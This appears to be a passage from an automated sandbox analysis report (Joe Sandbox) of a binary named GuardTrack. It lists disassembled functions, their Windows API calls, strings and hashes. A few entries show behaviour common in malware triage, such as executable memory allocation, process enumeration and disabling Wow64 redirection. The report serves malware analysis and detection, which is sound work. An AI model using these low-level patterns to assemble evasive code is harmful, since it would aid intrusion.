Opcode ID: 6e494538b51ab573f3b5908af61db9948382f88eb213738ffad5c7aac13b78f5
Instruction ID: d1fe523163eb13a86bd31316bd23ad0fa4c062b32b7406be40c9a9703d38a190
Opcode Fuzzy Hash: 6e494538b51ab573f3b5908af61db9948382f88eb213738ffad5c7aac13b78f5
Instruction Fuzzy Hash: 7C21A332604219BFDF258F54CC86FEE3BAAEF48724F111114FE156B190DA71A951DBE0

Function 006381B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0063826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0063827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00638284

Strings

msctls_updown32, xrefs: 006381E9

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 6c160b00487d16e7d3dfac49fff184f2f6426bc1ae136a78ae61fa8f4c238e31
Instruction ID: bac8d8bebf17f7d53158ef07bee9b4537cec3e569baedadfb842b074f2e9161c
Opcode Fuzzy Hash: 6c160b00487d16e7d3dfac49fff184f2f6426bc1ae136a78ae61fa8f4c238e31
Instruction Fuzzy Hash: 76216DB5604209AFDB10DF58CC85DA737AEEB8A394F180059FA0597351CB70EC51CAE0

Function 006372D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00637360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00637370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00637395

Strings

Listbox, xrefs: 0063732D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 494a95ed3a5c78f30373fab75c89b8d6d627e6d798970dc6f3915b54eb146acf
Instruction ID: 0dc141270fce4ade42cd7a8759c8c6634fc202c73272ab7be81d02aaa35d147b
Opcode Fuzzy Hash: 494a95ed3a5c78f30373fab75c89b8d6d627e6d798970dc6f3915b54eb146acf
Instruction Fuzzy Hash: 9921B072604118BFEF258F54CC85EFF3BABEB89764F118124FA059B290C671AC519BE0

Function 00637D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00637D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00637DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00637DB9

Strings

msctls_trackbar32, xrefs: 00637D6E

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: c2ad71ddea967eccdfdc239bb7d69d690c5ac1fbb86619118ad0e3158f3b00c6
Instruction ID: 9e42dd5d47ea48bcf42c2a099b7c55fd955e514ef00ee22c428bc835e7da7d60
Opcode Fuzzy Hash: c2ad71ddea967eccdfdc239bb7d69d690c5ac1fbb86619118ad0e3158f3b00c6
Instruction Fuzzy Hash: C3110A72244209BEDF245F64CC05FE73BAAEF89754F11412CFB45A6190D671E851DB60

Function 005EB4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 005EB544: _memset.LIBCMT ref: 005EB551

Part of subcall function 005D0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,005EB520,?,?,?,005B100A), ref: 005D0B79

IsDebuggerPresent.KERNEL32(?,?,?,005B100A), ref: 005EB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005B100A), ref: 005EB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 005EB52E
=e, xrefs: 005EB514

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=e
API String ID: 3158253471-3379168962
Opcode ID: f4965e69ae93dfdf38fd704802ddb216a8c9e00afd9a04e4c1ae1a32bd076b0b
Instruction ID: 0ed79075a036b241d54cd0c0f611e6c97ddd76ed65ec7bec94881f73d482e677
Opcode Fuzzy Hash: f4965e69ae93dfdf38fd704802ddb216a8c9e00afd9a04e4c1ae1a32bd076b0b
Instruction Fuzzy Hash: 16E065741007628BE3249F25E4087537EF1BF04745F00461EE496C2741F7B4D544CB91

Function 0062C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005F027A,?), ref: 0062C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0062C6F9

Strings

kernel32.dll, xrefs: 0062C6E2
GetSystemWow64DirectoryW, xrefs: 0062C6F3

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: a599957a584d65d206ac13d8841d7cded815bab8d32efabee808f623606d1970
Instruction ID: fe44d1f75237f3e67d2ba0b4e94fdbe991797b84a2b0a6effcbf13beb3238cac
Opcode Fuzzy Hash: a599957a584d65d206ac13d8841d7cded815bab8d32efabee808f623606d1970
Instruction Fuzzy Hash: AAE0C2B8110B32CFE7205B25DC48A9A76D6FF14325B509429E985C3310D770C880CF10

Function 005C4B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005C4B44,?,005C49D4,?,?,005C27AF,?,00000001), ref: 005C4B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 005C4B97

Strings

kernel32.dll, xrefs: 005C4B80
Wow64DisableWow64FsRedirection, xrefs: 005C4B91

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: aea4745a5c13f5353c755d297acedbd6fabe2627bbcef06f0a6203cf0e4924d8
Instruction ID: 770b342ebcd8d443e289eb7df688516c72c9d6fc18c284d630c06e74466d2795
Opcode Fuzzy Hash: aea4745a5c13f5353c755d297acedbd6fabe2627bbcef06f0a6203cf0e4924d8
Instruction Fuzzy Hash: 65D017B4520722CFEB209FB1DC28F067AE6AF05355F12982ED586E2650E6B0E880CA14

Function 005C4BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005C4AF7,?), ref: 005C4BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 005C4BCA

Strings

kernel32.dll, xrefs: 005C4BB3
Wow64RevertWow64FsRedirection, xrefs: 005C4BC4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: d8138505d238b6bd8d62c1850371076a504a71282f2095920e809a9c92f3d5d7
Instruction ID: 073b50c039b6c385171b57a992aa4bedbaf119f4e5a4f3f7aa557209eb5688cc
Opcode Fuzzy Hash: d8138505d238b6bd8d62c1850371076a504a71282f2095920e809a9c92f3d5d7
Instruction Fuzzy Hash: AED01274520722CFE7205FB1DC18F0676D6AF05355F11AC6DD585D2554DA78D880CA10

Function 00631447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00631696), ref: 00631455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00631467

Strings

RegDeleteKeyExW, xrefs: 00631461
advapi32.dll, xrefs: 00631450

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: ab44e51c79054a4dfb3360b4710cd72070691341a27fb7f15748298be3076acb
Instruction ID: a4fadb60ea7f84cf525bf2d9a0b536143d39790976d14737cd7615da6d609b39
Opcode Fuzzy Hash: ab44e51c79054a4dfb3360b4710cd72070691341a27fb7f15748298be3076acb
Instruction Fuzzy Hash: 21D01274510722CFE7205F75C80865676D6AF07395F11C82B94E5D7250D670D4C0CA50

Function 005C55F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,005C5E3D), ref: 005C55FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005C5610

Strings

kernel32.dll, xrefs: 005C55F9
GetNativeSystemInfo, xrefs: 005C560A

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: cdb367ef75c8748a88f5b37d4047cecb2fe66b70f5481e5c0412f4e3ac0de9bf
Instruction ID: 79ba63d8766bb2bb149d384568b3b873aba0ac2dd46caf7c349fc37214b742f1
Opcode Fuzzy Hash: cdb367ef75c8748a88f5b37d4047cecb2fe66b70f5481e5c0412f4e3ac0de9bf
Instruction Fuzzy Hash: 9BD01278520722CFF7205FB1C8086177AD5AF05355B11982DD586D2151E670D4C0CA50

Function 006297CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,006293DE,?,00640980), ref: 006297D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006297EA

Strings

kernel32.dll, xrefs: 006297D3
GetModuleHandleExW, xrefs: 006297E4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 17ad8271567a0aa9af615cdbd9e1043695bf818a518a6aca526ff104e7d5815f
Instruction ID: 7c221a5eb2e69f18e36c7f62945f7a04395ebc75e38095c697168eb648ebf4d4
Opcode Fuzzy Hash: 17ad8271567a0aa9af615cdbd9e1043695bf818a518a6aca526ff104e7d5815f
Instruction Fuzzy Hash: 8FD01274520733CFE7205F71E88864676D6AF05395F11A829D985D2250DB74C480CA11

Function 00607D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2eac565e7b6798ce40ef7079384ac73e20970a7a87d4be02588e7723721f1f
Instruction ID: 3ff425625d083d655bd4bbb5309d1cfbc44f046e068d31d2bd32292d09e850d6
Opcode Fuzzy Hash: ab2eac565e7b6798ce40ef7079384ac73e20970a7a87d4be02588e7723721f1f
Instruction Fuzzy Hash: 98C14C75A40216EFCB18CF94C884EABB7B6FF48714B118598E846DB391DB31ED81CB90

Function 0062E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0062E7A7
CharLowerBuffW.USER32(?,?), ref: 0062E7EA

Part of subcall function 0062DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0062DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0062E9EA
_memmove.LIBCMT ref: 0062E9FD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 8841e5bfaf77bc5dbe9cba080867ae9723797976017236d1cc5c42c44a488957
Instruction ID: 86d93a2c718a5c763865694640789abf77450b9a05c926292a8ed5b7cf1fb9b1
Opcode Fuzzy Hash: 8841e5bfaf77bc5dbe9cba080867ae9723797976017236d1cc5c42c44a488957
Instruction Fuzzy Hash: 3DC17B71A087118FC714DF28C484A6ABBE5FF89314F14896EF8999B352D731E946CF82

Function 0062877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006287AD
CoUninitialize.OLE32 ref: 006287B8

Part of subcall function 0063DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00628A0E,?,00000000), ref: 0063DF71

VariantInit.OLEAUT32(?), ref: 006287C3
VariantClear.OLEAUT32(?), ref: 00628A94

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: d8d9716d95b2037e67508de8acf552f5bab476d5b04e5e9dd53677455d83ee50
Instruction ID: ea8cdcde044462fd1878cb19f9fe693647b99ae0687fede90a6282a4b6d735d2
Opcode Fuzzy Hash: d8d9716d95b2037e67508de8acf552f5bab476d5b04e5e9dd53677455d83ee50
Instruction Fuzzy Hash: 62A13675604B129FD710EF14D885A6ABBE6BF88350F148849F9959B3A2CB30FD41CF92

Function 0060814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00643C4C,?), ref: 00608308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00643C4C,?), ref: 00608320
CLSIDFromProgID.OLE32(?,?,00000000,00640988,000000FF,?,00000000,00000800,00000000,?,00643C4C,?), ref: 00608345
_memcmp.LIBCMT ref: 00608366

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 51a45f59866e0acca8033e13ada6c2a5e578e24084b18da80706cae9fe2e1c84
Instruction ID: cc808b440a40001b3495a8c4057e9d5f3c84056c71f72f14ae062b4107823c20
Opcode Fuzzy Hash: 51a45f59866e0acca8033e13ada6c2a5e578e24084b18da80706cae9fe2e1c84
Instruction Fuzzy Hash: FA811D75A00209EFCB04DFD4C984EEEB7BAFF89315F104558E545AB251DB71AE06CBA0

Function 0060749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006074AC
SysAllocString.OLEAUT32(00000000), ref: 00607555
VariantCopy.OLEAUT32 ref: 00607584
VariantClear.OLEAUT32(?), ref: 006075AB

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 655507c954ade0d41ade31e4ad9250535182b048190cc1c772b0c66e2b12cbea
Instruction ID: 5c5e93ab261a82022959fecff761907ec723ee80dbe5965d5678d08f482901f8
Opcode Fuzzy Hash: 655507c954ade0d41ade31e4ad9250535182b048190cc1c772b0c66e2b12cbea
Instruction Fuzzy Hash: E151C834A987029ADB289F799895A7FB7E6AF44310B309C1FE547C73D1EA31B8418B05

Function 0062F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0062F526
Process32FirstW.KERNEL32(00000000,?), ref: 0062F534

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

Process32NextW.KERNEL32(00000000,?), ref: 0062F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0062F603

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 496e3d02bd80e2d4ad59ca912b301fc3baa3292752e053a8f760df101b6b2f22
Instruction ID: 906293d3681fd800ae1e390c1656b472d9812a7e966ee83807919d1d1b708820
Opcode Fuzzy Hash: 496e3d02bd80e2d4ad59ca912b301fc3baa3292752e053a8f760df101b6b2f22
Instruction Fuzzy Hash: 73517D711047129FD320EF60D849FABBBE9FF95710F00492DF585972A2EB70A904CB92

Function 00639E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00639E88
ScreenToClient.USER32(00000002,00000002), ref: 00639EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00639F28

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 4cb80533507ea40e7e2ace06d52dc1418d2332be55a88022c885554fe2256051
Instruction ID: c592805efe1dfe70831e358b82304dfda8ddaf747de72906a27f6db7260f361e
Opcode Fuzzy Hash: 4cb80533507ea40e7e2ace06d52dc1418d2332be55a88022c885554fe2256051
Instruction Fuzzy Hash: 59510B35A00209AFDB14DF68C8849AE7BB6FF85320F148569F915D73A0D770AD91CFA0

Function 005D492A Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 005D49C0
__flush.LIBCMT ref: 005D49E0
__write.LIBCMT ref: 005D4A13
__flsbuf.LIBCMT ref: 005D4A41

Part of subcall function 005D8D58: __getptd_noexit.LIBCMT ref: 005D8D58

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
